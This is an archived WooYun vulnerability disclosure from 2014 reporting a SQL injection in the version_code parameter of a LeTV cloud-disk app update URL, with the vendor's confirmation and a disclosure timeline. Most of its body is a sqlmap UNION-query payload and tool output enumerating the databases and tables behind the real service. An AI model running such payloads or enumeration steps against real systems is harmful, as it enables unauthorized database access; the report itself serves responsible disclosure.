乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-03: 细节已通知厂商并且等待厂商处理中 2014-05-03: 厂商已经确认,细节仅向厂商公开 2014-05-13: 细节向核心白帽子及相关领域专家公开 2014-05-23: 细节向普通白帽子公开 2014-06-02: 细节向实习白帽子公开 2014-06-17: 细节向公众公开
SQL注入
乐视云盘APP:
http://cloud.letv.com/ledisk//appupdate/index?v ersion_code=1003&channel=wandoujia
version_code参数存在注入
Place: GETParameter: version_code Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: version_code=1003 UNION ALL SELECT NULL,CONCAT(0x71756b7171,0x52655371416d78426d68,0x716c6e6971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#&channel=wandoujia---[22:19:38] [INFO] testing MySQL[22:19:38] [INFO] confirming MySQL[22:19:38] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.0[22:19:38] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\cloud.letv.com'[*] shutting down at 22:19:38
---[22:30:44] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5[22:30:44] [INFO] fetching database names[22:30:45] [INFO] the SQL query used returns 2 entries[22:30:45] [INFO] retrieved: "information_schema"[22:30:45] [INFO] retrieved: "ledisk"available databases [2]:[*] information_schema[*] ledisk[22:30:45] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\cloud.letv.com'[*] shutting down at 22:30:45
Database: information_schema[65 tables]+---------------------------------------+| CHARACTER_SETS || CLIENT_STATISTICS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_TEMPORARY_TABLES || GLOBAL_VARIABLES || INDEX_STATISTICS || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_PAGES || INNODB_BUFFER_POOL_PAGES_BLOB || INNODB_BUFFER_POOL_PAGES_INDEX || INNODB_BUFFER_POOL_STATS || INNODB_CHANGED_PAGES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_INDEX_STATS || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_RSEG || INNODB_SYS_COLUMNS || INNODB_SYS_FIELDS || INNODB_SYS_FOREIGN || INNODB_SYS_FOREIGN_COLS || INNODB_SYS_INDEXES || INNODB_SYS_STATS || INNODB_SYS_TABLES || INNODB_SYS_TABLESTATS || INNODB_TABLE_STATS || INNODB_TRX || INNODB_UNDO_LOGS || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || QUERY_RESPONSE_TIME || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TABLE_STATISTICS || TEMPORARY_TABLES || THREAD_STATISTICS || TRIGGERS || USER_PRIVILEGES || USER_STATISTICS || VIEWS || XTRADB_ADMIN_COMMAND |+---------------------------------------+
危害等级:高
漏洞Rank:18
确认时间:2014-05-03 23:15
感谢挖掘,我们会马上修复
暂无